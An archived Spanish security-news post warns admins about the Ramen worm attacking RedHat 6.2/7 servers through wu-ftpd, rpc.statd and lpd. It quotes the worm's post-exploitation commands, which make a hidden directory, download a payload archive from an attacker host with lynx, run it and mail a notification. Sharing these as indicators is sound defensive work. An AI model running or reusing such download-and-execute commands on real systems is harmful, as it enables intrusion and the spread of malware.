BULMA

RH6.2 y RH7 atacado por el gusano Ramen

Otra vez un script kiddie dando la nota… con la ayuda de RedHat

Un nuevo worn está circulando entre servidores RH6.2/7 (¿que raro no? ¿no os suena a otra empresa?). El nombre es Ramen worm y su nombre sale del scrip kiddie que lo ha hecho.
El gusano ataca a servidores wu.ftpd y rpc.statd, que por cierto son ultra super conocidas desde hace varios meses. Parece que sólo RedHat 6.2 y 7.0 son vulnerables.

El ataque comienza con una version modificada de syscan. Los comandos que ejecuta después de atacar al wu.ftpd (verificar si hay rastros, inclusive en este servidor :-):

mkdir /usr/src/.poop;cd /usr/src/.poop
export TERM=vt100
lynx -source http://FROMADDR:27374 > /usr/src/.poop/ramen.tgz
cp ramen.tgz /tmp
gzip -d ramen.tgz;tar -xvf ramen.tar;
./start.sh
echo Eat Your Ramen! | mail -s TOADDR \
-c [email protected] [email protected]

En máquinas con el Red Hat 7 parece atacar el servicio lpd

–ricardo

Este post ha sido traido de forma automatica desde https://web.archive.org/web/20140625063149/http:/bulma.net/body.phtml?nIdNoticia=416 por un robot nigromante, si crees que puede mejorarse, por favor, contactanos.

gallir

Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.